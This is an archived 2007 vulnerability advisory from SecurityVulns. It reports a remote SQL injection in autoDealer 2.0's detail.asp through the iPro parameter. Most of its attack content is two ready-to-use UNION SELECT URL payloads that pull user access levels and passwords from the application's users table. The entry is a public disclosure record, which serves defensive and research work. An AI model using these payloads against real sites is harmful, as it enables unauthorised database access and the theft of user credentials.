autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

2007-01-03T00:00:00
ID SECURITYVULNS:DOC:15560
Type securityvulns
Reporter Securityvulns
Modified 2007-01-03T00:00:00

Description


Title : autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : http://www.aspsiteware.com

$$ : $60.00


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users //detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

...

Im not Hacker!